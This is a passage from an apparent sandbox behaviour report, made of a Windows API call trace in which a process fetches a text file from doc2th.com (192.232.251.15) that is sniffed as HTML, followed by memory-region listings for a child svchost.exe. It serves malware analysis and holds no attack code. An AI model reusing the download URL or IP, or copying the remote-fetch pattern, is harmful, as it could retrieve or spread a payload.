DestroyWindow (hWnd=0x101fc) returned 1 [0047.378] DefWindowProcW (hWnd=0x101fc, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0047.378] PostQuitMessage (nExitCode=0) [0047.378] DllCanUnloadNow () returned 0x0 [0047.378] DllCanUnloadNow () returned 0x1 [0047.378] DllCanUnloadNow () returned 0x1 [0047.408] DefWindowProcW (hWnd=0x101fc, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0047.408] FreeLibrary (hLibModule=0x63150000) returned 1 [0047.408] GetModuleHandleA (lpModuleName="mscoree.dll") returned 0x0 [0047.408] ExitProcess (uExitCode=0x0) [0047.416] GetCurrentThreadId () returned 0xa1c [0047.416] DeleteObject (ho=0x140a027b) returned 1 [0047.416] DeleteObject (ho=0x120807e9) returned 1 Thread: id = 19 os_tid = 0xa20 Thread: id = 20 os_tid = 0xa24 [0027.161] GetCurrentThreadId () returned 0xa24 Thread: id = 21 os_tid = 0xa28 [0027.200] GetCurrentThreadId () returned 0xa28 Thread: id = 22 os_tid = 0xa2c [0027.202] GetCurrentThreadId () returned 0xa2c [0027.382] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0x20, szStatusText=0x0) returned 0x0 [0045.074] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0x1, szStatusText="doc2th.com") returned 0x0 [0045.074] GetCurrentThreadId () returned 0xa2c [0045.075] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0046.109] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0x2, szStatusText="192.232.251.15") returned 0x0 [0046.109] GetCurrentThreadId () returned 0xa2c [0046.304] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0xb, szStatusText=0x0) returned 0x0 [0046.551] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0x1f, szStatusText="text/plain") returned 0x0 [0046.551] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc19f [0046.551] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc1a0 [0046.551] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc1a1 [0046.551] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc1a2 [0046.551] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc1a3 [0046.551] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc1a4 [0046.551] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc1a5 [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc1a6 [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc1a7 [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc1a8 [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc1a9 [0046.552] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc1aa [0046.552] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc1ab [0046.552] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc1ac [0046.552] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc1ad [0046.552] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc1ae [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc1af [0046.552] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc1b0 [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc1b1 [0046.552] StrCmpNICW (lpStr1="text/pla", lpStr2="text/css", nChar=8) returned 13 [0046.552] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0xe, szStatusText="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\B9MX3V6B\\foobaz[1].txt") returned 0x0 [0046.552] GetCurrentProcessId () returned 0xa18 [0046.552] IInternetProtocolSink:ReportData (This=0x14b284, grfBSCF=0x11, ulProgress=0x1, ulProgressMax=0x0) returned 0x0 [0046.552] IUnknown:QueryInterface (in: This=0x14b3e8, riid=0x632c9460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1dce0e8 | out: ppvObject=0x1dce0e8*=0x14b3ec) returned 0x0 [0046.552] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0x1, pBuffer=0x1dcf0c0*=0x0, pcbBuf=0x1dce0f0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcf0c0*=0x74, pcbBuf=0x1dce0f0*=0xa, pdwFlags=0x0, pdwReserved=0x0) returned 0x0 [0046.552] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0xffff, pBuffer=0x1dcebc0*=0x78, pcbBuf=0x1dce0f0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcebc0*=0x76, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.552] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0x2e, pBuffer=0x1dcf3c0*=0x0, pcbBuf=0x1dce0d0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcf3c0*=0x76, pcbBuf=0x1dce0d0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.552] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0x4000000b, pBuffer=0x1dce0b4*=0x0, pcbBuf=0x1dce0f0*=0x10, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dce0b4*=0xe1, pcbBuf=0x1dce0f0*=0x10, pdwFlags=0x0, pdwReserved=0x0) returned 0x0 [0046.552] SystemTimeToFileTime (in: lpSystemTime=0x1dce0b4, lpFileTime=0x14b314 | out: lpFileTime=0x14b314) returned 1 [0046.552] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0xffff, pBuffer=0x1dcecc0*=0x58, pcbBuf=0x1dce0f0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcecc0*=0x76, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.553] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0xffff, pBuffer=0x1dcecc0*=0x44, pcbBuf=0x1dce0f0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcecc0*=0x76, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.553] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0xffff, pBuffer=0x1dcecc0*=0x43, pcbBuf=0x1dce0f0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcecc0*=0x76, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.553] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0xffff, pBuffer=0x1dcecc0*=0x58, pcbBuf=0x1dce0f0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcecc0*=0x76, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.553] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0x20000013, pBuffer=0x14b2f0*=0x0, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x14b2f0*=0xc8, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x0 [0046.553] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0x12, pBuffer=0x1dcf4c0*=0x0, pcbBuf=0x1dce0c8*=0xf, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcf4c0*=0x48, pcbBuf=0x1dce0c8*=0x8, pdwFlags=0x0, pdwReserved=0x0) returned 0x0 [0046.553] StrCmpICA (pszStr1="HTTP/1.0", pszStr2="HTTP/1.1") returned -1 [0046.553] IWinInetInfo:RemoteQueryOption (in: This=0x14b3ec, dwOption=0x17, pBuffer=0x1dce0d8*=0x0, pcbBuf=0x1dce0f0*=0x4 | out: pBuffer=0x1dce0d8*=0x0, pcbBuf=0x1dce0f0*=0x4) returned 0x0 [0046.553] IWinInetInfo:RemoteQueryOption (in: This=0x14b3ec, dwOption=0x1f, pBuffer=0x1dce0d8*=0x0, pcbBuf=0x1dce0f0*=0x4 | out: pBuffer=0x1dce0d8*=0x0, pcbBuf=0x1dce0f0*=0x4) returned 0x0 [0046.561] IWinInetInfo:RemoteQueryOption (in: This=0x14b3ec, dwOption=0x42, pBuffer=0x1dce0f4*=0xcc, pcbBuf=0x1dce0ec*=0x2cc | out: pBuffer=0x1dce0f4*=0xcc, pcbBuf=0x1dce0ec*=0x2cc) returned 0x0 [0046.561] IWinInetInfo:RemoteQueryOption (in: This=0x14b3ec, dwOption=0xfffe, pBuffer=0x14b334*=0x0, pcbBuf=0x1dce0f0*=0x4 | out: pBuffer=0x14b334*=0xb0, pcbBuf=0x1dce0f0*=0x4) returned 0x0 [0046.561] IUnknown:Release (This=0x14b3ec) returned 0x5 [0046.561] GetCurrentThreadId () returned 0xa2c [0046.561] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="text/plain", cchCount1=7, lpString2="charset", cchCount2=7) returned 3 [0046.561] GetCurrentThreadId () returned 0xa2c [0046.562] GetCurrentThreadId () returned 0xa2c [0046.562] MulDiv (nNumber=1, nNumerator=4000, nDenominator=1) returned 4000 [0046.562] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0046.562] GetCurrentThreadId () returned 0xa2c [0046.562] IInternetProtocol:Read (in: This=0x14b3e8, pv=0x16c2cc, cb=0x2000, pcbRead=0x1dcf4b4 | out: pv=0x16c2cc, pcbRead=0x1dcf4b4*=0x14f) returned 0x0 [0046.566] IInternetProtocol:Read (in: This=0x14b3e8, pv=0x16c41b, cb=0x1eb1, pcbRead=0x1dcf4b4 | out: pv=0x16c41b, pcbRead=0x1dcf4b4*=0x0) returned 0x1 [0046.579] IInternetProtocolSink:ReportData (This=0x14b284, grfBSCF=0x15, ulProgress=0x14f, ulProgressMax=0x0) returned 0x0 [0046.579] IInternetProtocolSink:ReportResult (This=0x14b284, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0 [0046.579] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="http://doc2th.com/tin/foobaz.txt", pSecMgr=0x0) returned 0x1 [0046.580] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1dcf328 | out: phkResult=0x1dcf328*=0x134) returned 0x0 [0046.580] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1dcf32c | out: phkResult=0x1dcf32c*=0x438) returned 0x0 [0046.580] RegOpenKeyExW (in: hKey=0x438, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x1dcf2e8 | out: phkResult=0x1dcf2e8*=0x0) returned 0x2 [0046.580] RegOpenKeyExW (in: hKey=0x134, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x1dcf2e8 | out: phkResult=0x1dcf2e8*=0x0) returned 0x2 [0046.580] RegCloseKey (hKey=0x0) returned 0x6 [0046.580] RegCloseKey (hKey=0x0) returned 0x6 [0046.580] RegCloseKey (hKey=0x134) returned 0x0 [0046.580] RegCloseKey (hKey=0x438) returned 0x0 [0046.585] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\B9MX3V6B\\foobaz[1].txt", pBuffer=0x1dcf3c8, cbSize=0xc8, pwzMimeProposed="text/plain", dwMimeFlags=0x6, ppwzMimeOut=0x1dcf380, dwReserved=0x0 | out: ppwzMimeOut=0x1dcf380*="text/html") returned 0x0 [0046.586] CoTaskMemFree (pv=0x144db0) [0046.586] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="http://doc2th.com/tin/foobaz.txt", pSecMgr=0x0) returned 0x1 [0046.586] StrCmpNIW (lpStr1="text/p", lpStr2="image/", nChar=6) returned 1 [0046.586] GetCurrentThreadId () returned 0xa2c [0046.586] SetEvent (hEvent=0x1bc) returned 1 [0046.595] GetCurrentThreadId () returned 0xa2c [0046.595] MulDiv (nNumber=334, nNumerator=4000, nDenominator=335) returned 3988 [0046.595] GetCurrentThreadId () returned 0xa2c [0046.595] SetEvent (hEvent=0x1bc) returned 1 [0046.596] GetCurrentThreadId () returned 0xa2c [0046.596] SetEvent (hEvent=0x1bc) returned 1 [0046.596] IUnknown:Release (This=0x14b284) returned 0x3 Thread: id = 23 os_tid = 0xa30 [0027.291] GetCurrentThreadId () returned 0xa30 Thread: id = 24 os_tid = 0xa34 [0027.372] GetCurrentThreadId () returned 0xa34 Thread: id = 25 os_tid = 0xa38 [0027.464] GetCurrentThreadId () returned 0xa38 [0027.464] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x63150000 [0027.465] CoInitialize (pvReserved=0x0) returned 0x0 [0027.465] WaitForSingleObject (hHandle=0x1bc, dwMilliseconds=0x927c0) returned 0x0 [0046.586] GetTickCount () returned 0x1a707 [0046.586] IInternetProtocolRoot:Terminate (This=0x14b3e8, dwOptions=0x0) returned 0x0 [0046.586] IUnknown:Release (This=0x14b248) returned 0x7 [0046.586] IUnknown:Release (This=0x14b248) returned 0x6 [0046.587] IUnknown:Release (This=0x14b24c) returned 0x5 [0046.587] IUnknown:Release (This=0x14b244) returned 0x4 [0046.587] IUnknown:Release (This=0x14b284) returned 0x3 [0046.587] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f2e0, cbMultiByte=335, lpWideCharStr=0x1702f4, cchWideChar=335 | out: lpWideCharStr="\r\n") returned 335 [0046.587] IUnknown:AddRef (This=0x11ae64) returned 0x11 [0046.587] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x233f7dc | out: lpCPInfo=0x233f7dc) returned 1 [0046.587] IUnknown:AddRef (This=0x124868) returned 0x4 [0046.587] IUnknown:AddRef (This=0x11ae64) returned 0x12 [0046.587] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x233f7e4 | out: ppvObject=0x233f7e4*=0x11ae64) returned 0x0 [0046.587] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.587] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.587] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x233f7e8 | out: pdwScheme=0x233f7e8*=0x2) returned 0x0 [0046.588] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.588] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0046.591] GetTickCount () returned 0x1a717 [0046.592] WaitForSingleObject (hHandle=0x1bc, dwMilliseconds=0x927c0) returned 0x0 [0046.595] GetTickCount () returned 0x1a717 [0046.596] WaitForSingleObject (hHandle=0x1bc, dwMilliseconds=0x927c0) returned 0x0 [0046.596] GetTickCount () returned 0x1a717 [0046.596] WaitForSingleObject (hHandle=0x1bc, dwMilliseconds=0x927c0) returned 0x0 [0047.253] GetTickCount () returned 0x1a85f [0047.254] WaitForSingleObject (hHandle=0x1bc, dwMilliseconds=0x927c0) returned 0x0 [0047.376] CoUninitialize () [0047.376] FreeLibraryAndExitThread (hLibModule=0x63150000, dwExitCode=0x0) [0047.377] GetCurrentThreadId () returned 0xa38 Thread: id = 26 os_tid = 0xa3c [0027.468] GetCurrentThreadId () returned 0xa3c Thread: id = 47 os_tid = 0xa94 [0036.872] GetCurrentThreadId () returned 0xa94 Thread: id = 50 os_tid = 0xb38 [0046.111] GetCurrentThreadId () returned 0xb38 Thread: id = 51 os_tid = 0xb3c [0047.028] GetCurrentThreadId () returned 0xb3c [0047.191] GetCurrentThreadId () returned 0xb3c Thread: id = 52 os_tid = 0xb40 [0047.177] GetCurrentThreadId () returned 0xb40 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1e6200" os_pid = "0x3f4" os_integrity_level = "0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0xa18" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c858" [0xc000000f], "LOCAL" [0x7] Region: id = 554 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 555 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 556 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 557 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 558 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 559 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 560 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 561 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 562 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 563 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 564 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 565 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x210000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 566 start_va = 0x220000 end_va = 0x223fff entry_point = 0x220000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 567 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 568 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 569 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 570 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 571 start_va = 0x280000 end_va = 0x2fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 572 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 573 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 574 start_va = 0x550000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 575 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 576 start_va = 0x5d0000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 577 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 578 start_va = 0x6b0000 end_va = 0x6b7fff entry_point = 0x6b0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 579 start_va = 0x6c0000 end_va = 0xab2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 580 start_va = 0xaf0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 581 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 582 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 583 start_va = 0xbe0000 end_va = 0xeaefff entry_point = 0xbe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 584 start_va = 0xeb0000 end_va = 0xf6ffff entry_point = 0xeb0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 585 start_va = 0xf80000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 586 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 587 start_va = 0x10a0000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 588 start_va = 0x10e0000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 589 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 590 start_va = 0x11b0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 591 start_va = 0x1270000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 592 start_va = 0x12b0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 593 start_va = 0x12c0000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 594 start_va = 0x13c0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 595 start_va = 0x1570000 end_va = 0x15affff entry_point = 0x0 region_type = private name = "private_0x0000000001570000" filename = "" Region: id = 596 start_va = 0x15d0000 end_va = 0x160ffff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 597 start_va = 0x1630000 end_va = 0x166ffff entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 598 start_va = 0x16a0000 end_va = 0x16dffff entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 599 start_va = 0x1730000 end_va = 0x173ffff entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 600 start_va = 0x1790000 end_va = 0x17cffff entry_point = 0x0 region_type = private name = "private_0x0000000001790000" filename = "" Region: id = 601 start_va = 0x6e2d0000 end_va = 0x6e2d7fff entry_point = 0x6e2d0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 602 start_va = 0x6e370000 end_va = 0x6e37cfff entry_point = 0x6e370000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 603 start_va = 0x6e380000 end_va = 0x6e382fff entry_point = 0x6e380000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 604 start_va = 0x6e390000 end_va = 0x6e41ffff entry_point = 0x6e390000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 605 start_va = 0x6e870000 end_va = 0x6e881fff entry_point = 0x6e870000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 606 start_va = 0x6eb80000 end_va = 0x6ebe0fff entry_point = 0x6eb80000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 607 start_va = 0x6f010000 end_va = 0x6f015fff entry_point = 0x6f010000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 608 start_va = 0x6f530000 end_va = 0x6f589fff entry_point = 0x6f530000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 609 start_va = 0x71220000 end_va = 0x7126bfff entry_point = 0x71220000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 610 start_va = 0x716a0000 end_va = 0x716eefff entry_point = 0x716a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 611 start_va = 0x716f0000 end_va = 0x71747fff entry_point = 0x716f0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 612 start_va = 0x71950000 end_va = 0x71964fff entry_point = 0x71950000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 613 start_va = 0x71df0000 end_va = 0x71e01fff entry_point = 0x71df0000 region_type = mapped_file name = "vmictimeprovider.dll" filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 614 start_va = 0x71f30000 end_va = 0x71f79fff entry_point = 0x71f30000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 615 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 616 start_va = 0x73270000 end_va = 0x7327cfff entry_point = 0x73270000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 617 start_va = 0x73280000 end_va = 0x732b7fff entry_point = 0x73280000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 618 start_va = 0x73390000 end_va = 0x73397fff entry_point = 0x73390000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 619 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 620 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: 